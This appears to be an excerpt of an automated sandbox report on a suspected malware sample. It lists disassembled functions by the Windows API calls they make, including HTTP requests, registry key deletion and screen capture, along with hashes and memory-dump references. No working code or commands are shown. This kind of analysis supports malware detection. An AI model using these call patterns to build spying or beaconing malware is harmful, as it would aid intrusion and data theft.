                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB7935
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EB794E
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EB7955
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EB796D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EB7985
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d529e63c16b0fc0aee3c463ff6fc7a283e87b9d06baea78469fd6b300042209
                                                                                                                                                                                                                                                                                                    • Instruction ID: a33e78330cfec5cd5140f2dabbe438722e43d17449afa87e07e5ddad9b012691
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d529e63c16b0fc0aee3c463ff6fc7a283e87b9d06baea78469fd6b300042209
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA717670108244AFD726CF19CC48BABBBF9FBC9304F04555EF995A72A1DB70A90ACB11
                                                                                                                                                                                                                                                                                                    Function 00E2146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E21488,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E21865
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00E21521
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E215BB
                                                                                                                                                                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00E629B4
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E629E2
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E629F9
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E2145A,00000000), ref: 00E62A15
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E62A27
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                    • String ID: <)
                                                                                                                                                                                                                                                                                                    • API String ID: 641708696-200976629
                                                                                                                                                                                                                                                                                                    • Opcode ID: ad511d1973392f1ccee5cf23e1840cb202f094e5a18b864e3ee3931226cd0b29
                                                                                                                                                                                                                                                                                                    • Instruction ID: a58952af0ddf8f2222a03fefd55f896838e27c64bbedc02024a7d58933825be0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad511d1973392f1ccee5cf23e1840cb202f094e5a18b864e3ee3931226cd0b29
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15619B30545B21DFCB399F15E948B3A77B1FBD032AF10A19DE5427B660C7B0AA94CB80
                                                                                                                                                                                                                                                                                                    Function 00E9CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E9CEF5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E9CF08
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E9CF1C
                                                                                                                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E9CF35
                                                                                                                                                                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E9CF78
                                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E9CF8E
                                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E9CF99
                                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E9CFC9
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E9D021
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E9D035
                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00E9D040
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: f82c87a23d4851b52ee4a5044063e21075e2e1b529e4e2c699b2f4ed38b17d03
                                                                                                                                                                                                                                                                                                    • Instruction ID: 843c285dd86ab35381f8c4ccd8edd9a281fe02b6b632381719c5b3d87a3f91c0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f82c87a23d4851b52ee4a5044063e21075e2e1b529e4e2c699b2f4ed38b17d03
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06518EB1504608BFDB219F61CC88AAB7BFDFF08788F10551AF945A6250E734D949EBA0
                                                                                                                                                                                                                                                                                                    Function 00EB8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EB66D6,?,?), ref: 00EB8FEE
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB8FFE
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9009
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9016
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00EB9024
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9033
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00EB903C
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9043
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9054
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EC0C04,?), ref: 00EB906D
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00EB907D
                                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00EB909D
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00EB90CD
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EB90F5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EB910B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87b9b59461ee38ad4b3dbd8654c34dd641f49dd4b0c5aaf2b1d6d8a81046fe8b
                                                                                                                                                                                                                                                                                                    • Instruction ID: cd78a12dcd3adb8a435eee08b89f578700541fe9793d081b5110eaedd1920eab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b9b59461ee38ad4b3dbd8654c34dd641f49dd4b0c5aaf2b1d6d8a81046fe8b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A414975604209BFDB119F6ADC88EABBBB8FF89715F108168F905E7261E7309D05CB20
                                                                                                                                                                                                                                                                                                    Function 00EAC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC154
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EAC1D2
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00EAC26A
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAC2DE
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAC2FC
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00EAC352
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EAC364
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EAC382
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00EAC3E3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAC3F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 174ec3177ce6f8c45c5f8bb921d1e30a8f9faa6a4213ece30182efa892dc3205
                                                                                                                                                                                                                                                                                                    • Instruction ID: bf65cfba1f70c88567b6d957975b8a7c562f4b22a30c4c19f168abe952813450
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 174ec3177ce6f8c45c5f8bb921d1e30a8f9faa6a4213ece30182efa892dc3205
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57C16C35208201AFD714DF14C895F6ABBE1BF89308F24959CE456AF2A2CB71FC46CB91
                                                                                                                                                                                                                                                                                                    Function 00EBA94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00EBA990
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00EBA9A7
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00EBA9B3
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00EBA9C9
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00EBAC15
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EBAC33
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EBAC54
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00EBAC73
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EBAC95
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 00EBACBB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                    • String ID: @$(
                                                                                                                                                                                                                                                                                                    • API String ID: 3962739598-2721164788
                                                                                                                                                                                                                                                                                                    • Opcode ID: da8636e8d13aaaa1d73a55a1ca926608e0f5adbd469c8b3eebe6a1fd354ce8cc
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3bea88920137553d86df5525a98dc937835671d2880f6ae57859857b06eccbb2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da8636e8d13aaaa1d73a55a1ca926608e0f5adbd469c8b3eebe6a1fd354ce8cc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDB17631600219EFCF14CF69C9847FE7BF2BF84704F189069ED48AA295D770A984CBA1
                                                                                                                                                                                                                                                                                                    Function 00EB976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EB97B6
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00EB97C6
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00EB97D1
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00EB9879
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EB992B
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00EB9948
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00EB9958
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EB998A
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EB99CC
                                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EB99FD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0$(
                                                                                                                                                                                                                                                                                                    • API String ID: 1026556194-1385328161
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e1741aa60ca5a014c41bf727648ae8cbdbbe609ed32165ec9ba73c165909012
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3704c4511bbb8e56ce3c465ece695483d0e979031ee676f7f3ff99e064fb9d6e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e1741aa60ca5a014c41bf727648ae8cbdbbe609ed32165ec9ba73c165909012
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA81BF715083019FD724CF25D885AAB7BE8FB89318F101A1DFA85B7292DB30D905CBA2
                                                                                                                                                                                                                                                                                                    Function 00EA2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00EA3035
                                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00EA3045
                                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00EA3051
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00EA305E
                                                                                                                                                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00EA30CA
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00EA3109
                                                                                                                                                                                                                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00EA312D
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00EA3135
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00EA313E
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00EA3145
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00EA3150
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8a20c5f499b5d27893d27c1d63c50dfc9288c12c22390dcd2877faaabdcca759
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8f005180b1e21787874845517d38ad571a69837c22ae14c9f0846bea01ae84c8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a20c5f499b5d27893d27c1d63c50dfc9288c12c22390dcd2877faaabdcca759
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF61C0B5D05219AFCB05CFA8DC84AAEBBF6FF48310F208529E555B7250E771AA41CF90
                                                                                                                                                                                                                                                                                                    Function 00E852AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00E852E6
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00E85328
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E85339
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00E85345
                                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00E8537A
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E853B2
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00E853EB
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00E85445
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00E85477
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E854EF
